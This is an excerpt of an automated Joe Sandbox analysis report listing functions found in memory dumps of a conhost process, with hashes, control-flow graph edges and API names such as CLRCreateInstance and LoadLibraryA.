                                          • Instruction ID: e92b2212c50144a0dfc15a86679443d636da4a462d088776df2bfad455ad747a
                                          • Opcode Fuzzy Hash: 2e047e9e8caa7f93d72262577d5b56afd29b01a3bd38d28755385d955b6ad381
                                          • Instruction Fuzzy Hash: 6B220820A1CF494FE78AE7288451779B7E2EF8A340F5940B9D44DDB2E7DE697C818381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00095 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL
                                          • API String ID: 0-421114002
                                          • Opcode ID: feecd4c49e5d5db6c8ac602f1e4c7a5e3100c04bf4eae15fc49ae7e937b9978d
                                          • Instruction ID: 6556e5135163f82342854755308fe2ff2d3ceda729c489c9dc1c32b998276a45
                                          • Opcode Fuzzy Hash: feecd4c49e5d5db6c8ac602f1e4c7a5e3100c04bf4eae15fc49ae7e937b9978d
                                          • Instruction Fuzzy Hash: 47C1D627D0D7C25EE702DB6C68551E63F60EF93265B1B00FBD1E8CA0E7DB45285A83A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00000286977B4AB2 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 311 286977b4ab2-286977b4aec 312 286977b4cf5-286977b4cf7 311->312 313 286977b4af2-286977b4b05 CLRCreateInstance 311->313 316 286977b4b92-286977b4b9e 312->316 317 286977b4cfd-286977b4d03 312->317 314 286977b4cd1-286977b4cd2 313->314 315 286977b4b0b-286977b4b45 313->315 318 286977b4cd4-286977b4ced 314->318 326 286977b4b87-286977b4b88 315->326 327 286977b4b47-286977b4b5a 315->327 322 286977b4ba4-286977b4bf3 316->322 323 286977b4cb2-286977b4cb3 316->323 319 286977b4cb5-286977b4cd0 317->319 318->312 322->323 336 286977b4bf9-286977b4c0f 322->336 323->319 328 286977b4b8a-286977b4b8c 326->328 327->318 331 286977b4b60-286977b4b68 327->331 328->316 328->318 331->328 333 286977b4b6a-286977b4b80 331->333 335 286977b4b85 333->335 335->328 336->323 338 286977b4c15-286977b4c46 336->338 338->323 340 286977b4c48-286977b4c54 338->340 341 286977b4c56-286977b4c69 340->341 342 286977b4c6b-286977b4c77 340->342 341->341 341->342 343 286977b4c7f-286977b4c91 342->343 344 286977b4c93-286977b4ca7 343->344 345 286977b4ca9-286977b4caa 343->345 344->344 344->345 345->323
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID:
                                          • API String ID: 542301482-0
                                          • Opcode ID: 6897f6c5658fd02445411d2cd62f691495e6ef8d9a8d3b03fbdb7ace318125ef
                                          • Instruction ID: 0bf5bebb6a5d48a25ec596bda9cbd8aa1d965702474de4593134ac72bcac9fd7
                                          • Opcode Fuzzy Hash: 6897f6c5658fd02445411d2cd62f691495e6ef8d9a8d3b03fbdb7ace318125ef
                                          • Instruction Fuzzy Hash: 7E815E31209B088FDB68EF28D88CBA677E5FF99301F004A6DD59BCB191EE31E5458B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00000286977B3FBA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 464 286977b3fba-286977b3fdd LoadLibraryA 465 286977b3fdf-286977b3fe4 464->465 466 286977b3fe9-286977b3ffc 464->466 467 286977b40c0-286977b40d0 465->467 469 286977b40be 466->469 470 286977b4002-286977b4013 466->470 469->467 470->469 471 286977b4019-286977b4031 470->471 471->469 473 286977b4037-286977b406b call 286977b645e 471->473 473->469 478 286977b406d-286977b407e 473->478 478->469 479 286977b4080-286977b4097 478->479 479->469 481 286977b4099-286977b40b9 call 286977b645e 479->481 481->465
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: a6d2981f586674fbdf335614c4bb198a8119d31359594c248aba1880bd946cf0
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: AE31C03130DA184FEB48AE28E84D7AA73D5EB98310F001559ED4BC72CADDB0ED0287C2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00000286977B3EAF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 485 286977b3eaf-286977b3ec5 LoadLibraryA 486 286977b3ed1-286977b3ee4 485->486 487 286977b3ec7-286977b3ecc 485->487 490 286977b3fa6 486->490 491 286977b3eea-286977b3efb 486->491 488 286977b3fa8-286977b3fb8 487->488 490->488 491->490 492 286977b3f01-286977b3f19 491->492 492->490 494 286977b3f1f-286977b3f53 call 286977b645e 492->494 494->490 499 286977b3f55-286977b3f66 494->499 499->490 500 286977b3f68-286977b3f7f 499->500 500->490 502 286977b3f81-286977b3fa1 call 286977b645e 500->502 502->487
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: bae6cb76c4b14611492efa362d9ae6fa2bcc7127c65b6da293499123f1942822
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction Fuzzy Hash: F131AF3530DA084FDF58AE58984D3A973E2E7D8320F00966AEE1BCB2C9DD70ED418781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00000286977B3EA2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 506 286977b3ea2-286977b3ec5 LoadLibraryA 508 286977b3ed1-286977b3ee4 506->508 509 286977b3ec7-286977b3ecc 506->509 512 286977b3fa6 508->512 513 286977b3eea-286977b3efb 508->513 510 286977b3fa8-286977b3fb8 509->510 512->510 513->512 514 286977b3f01-286977b3f19 513->514 514->512 516 286977b3f1f-286977b3f53 call 286977b645e 514->516 516->512 521 286977b3f55-286977b3f66 516->521 521->512 522 286977b3f68-286977b3f7f 521->522 522->512 524 286977b3f81-286977b3fa1 call 286977b645e 522->524 524->509
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: 0f9c833061359b210eccfe765759304dd797a27335cd560e6099818e9e843ec6
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: 00E0203130DA0D1FF758999DD84E7B667D8D795371F00103FF649C2141E455E8D103A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C002AA Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 528 7ff9f1c002aa-7ff9f1c004a1 534 7ff9f1c004c4 528->534 535 7ff9f1c004a3-7ff9f1c004c1 528->535 536 7ff9f1c004cb-7ff9f1c004dc call 7ff9f1c00088 534->536 535->536 539 7ff9f1c004e1-7ff9f1c0050a 536->539
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL
                                          • API String ID: 0-421114002
                                          • Opcode ID: efacb83930d58404342c772cc3cc60e0bc463f1b53b32f8425a2576170032543
                                          • Instruction ID: 36d9288a5a2c0c380c22bf2ee54168008a63679c09fa50d56a75d27741d07b0a
                                          • Opcode Fuzzy Hash: efacb83930d58404342c772cc3cc60e0bc463f1b53b32f8425a2576170032543
                                          • Instruction Fuzzy Hash: 4B31642190E7C55FDB43E73858256A97FB0AF47214B0A40FBD098CF1E7DA28199983A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00580 Relevance: .2, Instructions: 191COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 604 7ff9f1c00580-7ff9f1c00637 613 7ff9f1c00641-7ff9f1c006a6 604->613 614 7ff9f1c00639-7ff9f1c0063a 604->614 621 7ff9f1c006a8-7ff9f1c006ab 613->621 622 7ff9f1c006da-7ff9f1c00703 613->622 614->613 624 7ff9f1c006b5-7ff9f1c006d8 621->624 625 7ff9f1c0070a-7ff9f1c00721 622->625 624->625
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56babbad2cc2fa5fd3d670f4ccde223c28cf2ed9cc0beae5ef2d0971f5972be1
                                          • Instruction ID: 1211083db6b06d6ab1aa4d7390c57d3b1919c6a148fc080b6899a06633dc3ceb
                                          • Opcode Fuzzy Hash: 56babbad2cc2fa5fd3d670f4ccde223c28cf2ed9cc0beae5ef2d0971f5972be1
                                          • Instruction Fuzzy Hash: 1751E421B1CA494FE748FB2C940A779B7D2EF9A700F1541BAE04DC32E7DE68EC424695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00561 Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b2d1e674696717189e2ddeb7275e80af64009bb2c58ef9338ac53a0201f2af2
                                          • Instruction ID: 0d59714c9f2a80a1f8de0360e4748403774607c053c2b59ad850c46ae4216d8b
                                          • Opcode Fuzzy Hash: 9b2d1e674696717189e2ddeb7275e80af64009bb2c58ef9338ac53a0201f2af2
                                          • Instruction Fuzzy Hash: B9513921B1CA494FE744FB2C980A7B577D2EF9A340F1541BAE04DC72E7DE68AC428395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00088 Relevance: .2, Instructions: 174COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 7ff9f1c00088-7ff9f1c00637 666 7ff9f1c00641-7ff9f1c006a6 654->666 667 7ff9f1c00639-7ff9f1c0063a 654->667 674 7ff9f1c006a8-7ff9f1c006ab 666->674 675 7ff9f1c006da-7ff9f1c00703 666->675 667->666 677 7ff9f1c006b5-7ff9f1c006d8 674->677 678 7ff9f1c0070a-7ff9f1c00721 675->678 677->678
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2df7ac9c343eda8a5179dc9dd977b0bec667e5dc521f6c83c44a930613fa9469
                                          • Instruction ID: d1052bd05933d0db60af239cf921f4e4ddd2c8362a332a5b0e737d928900b745
                                          • Opcode Fuzzy Hash: 2df7ac9c343eda8a5179dc9dd977b0bec667e5dc521f6c83c44a930613fa9469
                                          • Instruction Fuzzy Hash: 7C411920B1CA494FE744F72C940A7B977D2EF9A740F1541BAE44DC32E7DE68AC424395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00842 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 406291befd3d07a360c71e39248d143a09a7984be70fc9a6bbbc99fc3fcffad8
                                          • Instruction ID: 4984b3c3ca6d4b981ca56128ae461f2b77843ef8dae8d072235d2147d95cc860
                                          • Opcode Fuzzy Hash: 406291befd3d07a360c71e39248d143a09a7984be70fc9a6bbbc99fc3fcffad8
                                          • Instruction Fuzzy Hash: AA21C22180D6C24FE317937448217947FA0AF03294F1E02EAC498CB1E7DE5D64A9C3A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00722 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fc2713af0e73cf7a3f1005f822a4a54b096d8d16dd8a3a1488b6debdd6c996d
                                          • Instruction ID: f4d2d007483eccd71cd073ee6119bdf05434bbc161c4a16d747c2419571e886e
                                          • Opcode Fuzzy Hash: 7fc2713af0e73cf7a3f1005f822a4a54b096d8d16dd8a3a1488b6debdd6c996d
                                          • Instruction Fuzzy Hash: 0611FA35B5C91D8FDB88EB9CD4957BCB7E1EF59311F01007AD11ED3292CE65A8928B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C0050D Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73b6245d0a591768fd6861f737b2d070a3981a7916b17674848ca051778fbd5e
                                          • Instruction ID: 41ad400988895873f3e8b6f1e1fc837a4400bd597f985af736ae1693590c9efe
                                          • Opcode Fuzzy Hash: 73b6245d0a591768fd6861f737b2d070a3981a7916b17674848ca051778fbd5e
                                          • Instruction Fuzzy Hash: 0DF0B821B0DD594FD788F33C5455AA86BC2EF98220B4A41F6C00CCB2A3EA28E8808380
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00520 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 866dc2dbd041339e84ff2032a8f0b3eb1a316788571ec41914f48c8dd56cf09d
                                          • Instruction ID: 12b76b10dc235255aebac9b05a62040bc92c5db29da4cb547a05f90498ccbf58
                                          • Opcode Fuzzy Hash: 866dc2dbd041339e84ff2032a8f0b3eb1a316788571ec41914f48c8dd56cf09d
                                          • Instruction Fuzzy Hash: E0E01A21B18C1D4F9A94F73C5445AA962D2EB9C250B5645B6E40CC32A6DD28DC918390
                                          Uniqueness

                                          Uniqueness Score: -1.00%